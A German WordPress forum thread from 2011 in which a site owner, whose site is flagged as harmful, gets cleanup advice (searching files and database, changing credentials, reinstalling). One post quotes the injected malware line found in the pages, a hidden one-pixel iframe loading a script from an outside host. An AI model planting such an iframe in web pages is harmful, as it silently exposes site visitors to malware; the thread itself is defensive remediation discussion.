1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

meine Website wird als schädlich eingestuft

Dieses Thema im Forum "Allgemeines" wurde erstellt von osnapicture, 6. Mai 2011.

  1. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
  2. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.345
    Zustimmungen:
    587
    Hallo,

    leider wurde auf deiner WebSite eine Sicherheitslücke gefunden. Über diese Lücke würde ein Malware (link?) eingefügt.

    Code:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    Da mindestens 15 Seite betroffen sind - vermute ich, dass eine Datei auf dem Server verändert oder deine Datenbank verändert.

    Am einfachten nimmst du 100 bis 250 Euro in die Hand und sucht dir einen, der deine Seite von der Malware säubert und die Sicherheitslücken schließt.

    Oder du suchst selber...
    Hier würde ich in der Datenbank anfangen und nach JavaScripten in Beiträgen, suchen die dort nicht verloren haben.

    und in den Log - Files suchen, wie der Angreifer diesen Code in die Datenbank gebracht hat.

    Sollten die Änderungen an den Dateien erfolgt sein? Die Log Files untersuchen und eine saubere Sicherheitskopie zurück spielen...

    viel glück

    ralf
     
  3. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    ohje, das klingt ja übel
     
  4. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Ich habe jetzt auf einigen Seiten im Quellcode hinter dem schließenden htm folgende Zeile gefunden:
    <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=1920633"></iframe>
    Nur wie und wo kann ich diese entfernen? Über den Seiteneditor im Backend kann erscheint der Code nicht.

    Hier der komplette Bericht: http://sitecheck.sucuri.net/scanner/?scan=www.osnapicture.de
     
    #4 osnapicture, 6. Mai 2011
    Zuletzt bearbeitet: 6. Mai 2011
  5. bgeissler

    bgeissler Well-Known Member

    Registriert seit:
    6. August 2006
    Beiträge:
    4.404
    Zustimmungen:
    0
    Ändere deinen Admin, Name und Passwort und lösche den bisherigen.
    Schau per FTP in den php-Dateien deines Themes nach dem Code.
     
  6. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Ganz blöde Frage: Wo in meinem Theme-Ordner muss ich denn danach suchen?
     
  7. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Nicht nur im Theme-Ordner, sondern in allen Dateien. Gerne verbreiten sich solche Dinger in allen index u. Javascriptdateien. Ergo: Wenn Du keine komplette Neuinstallation machen möchtest u. wirklich sicher gehen willst, dass der Schadcode überall entfernt wird, dann durchsuche alle Dateien (html, php, js) auf dem Webspace, sowie die Datenbank per PHPMyAdmin

    Dabei nützlich sein kann dieses Tool: http://www.inforapid.de/html/seladen.htm
     
  8. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Ich habe mir jetzt alle Dateien per FTP auf den Desktop geladen und dort per Windows-Suche nach "curem" gesucht. Das steht ja überall im Quallcode der infizierten Dateien. Aber per Suche lassen sich die Dateien nicht aufstöbern. Was mach ich falsch?
     
  9. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Habe noch weiter auf meinem Server gesucht. Dort gibt es einen ".log" Ordner. Darin befinden sich hunderte html Seiten aus aller Welt. Wie kommen die darein? Kann das was mit meinem Fehler zu tun haben? Und kann ich die einfach löschen?
     
  10. Jez

    Jez Well-Known Member

    Registriert seit:
    11. Februar 2010
    Beiträge:
    103
    Zustimmungen:
    0
    Das würde doch Therorätisch auch funktionieren wenn er ein Backup machen würde , aber nicht von der Datenbank und dann alles von neu draufsetzten im Notfall , weil das mit den Säubern würde länger dauern als das.
     
  11. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Ich habe den Code, der für das schädliche iframe sorgte in der index.php gefunden und gelöscht. Außerdem habe ich natürlich mein FTP-Kennwort geändert.
    Ich bin kein Experte, aber aus meiner Sicht müsste jetzt wieder alles klar sein, oder? Ich habe deshalb bei google einen Antrag auf erneute Überprüfung der Seite gestellt. Dem müsste doch stattgegeben werden, oder?
     
  12. WP-Theme.eu

    WP-Theme.eu Well-Known Member

    Registriert seit:
    3. August 2010
    Beiträge:
    323
    Zustimmungen:
    0
    Oh je, security scan nicht installiert?

    Grundsätzlich: wp_admin und/oder admin auf ein anderes Nutzername von Anfang an ändern.

    Ich würde jetzt via FTP einen neuen Ordner installieren und darin eine neue WP Installatiion bringen. Auch DB würde ich neu machen, wenn der Hoster dies erlaubt. Das Theme als zip-Datei neu aufladen.
    Alle alten Sachen löschen, löschen, löschen....

    Ob das alles in Ordnung bringt, ist fraglich, aber für mich ist eine derartige Infizierung genauso schlimm wie ein Trojaner auf Festplatte. Dabei hilft auch kein Virenprogramm zu 100% - nur Formatieren der Festplatte :)

    Ist übrigens auch günstiger als einen Experten zum Werk zu bringen.

    Viel Erfolg noch
    RG
     
  13. osnapicture

    osnapicture Well-Known Member

    Registriert seit:
    5. Juni 2009
    Beiträge:
    200
    Zustimmungen:
    0
    Deine Antwort bringt mich leider nicht so wirklich weiter. Was meinst Du mit "wp_admin und/oder admin auf ein anderes Nutzername von Anfang an ändern"? Und was ist security scan?
    Ist mein Fehler jetzt wohl behoben und wird google die Sperrung der Seite aufheben oder muss ich noch irgendetwas machen?
     
  14. WP-Theme.eu

    WP-Theme.eu Well-Known Member

    Registriert seit:
    3. August 2010
    Beiträge:
    323
    Zustimmungen:
    0
    Oh, sorry.

    In vielen Fällen wird bei Erstanmeldung bzw. Einrichtung von Wordpress gleich ein Benutzername (Adminname) eingerichtet: entweder admin oder wp_admin. Dies müsste gleich bei Erstanmeldung geändert werden.

    Security Scan ist ein nützliches Plug-In, das man an einem laufenden Wordpress unbedingt installiert haben sollte.
     
  15. WP-Theme.eu

    WP-Theme.eu Well-Known Member

    Registriert seit:
    3. August 2010
    Beiträge:
    323
    Zustimmungen:
    0
    Ob deine Seite jetzt fehlerfrei weiter läuft, weiß ich leider nicht. Aber oben habe ich bereits erwähnt, dass eine komplette Neuinstallation, meiner bescheidenen Meinung nach, sehr empfehlenswert ist. :)
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden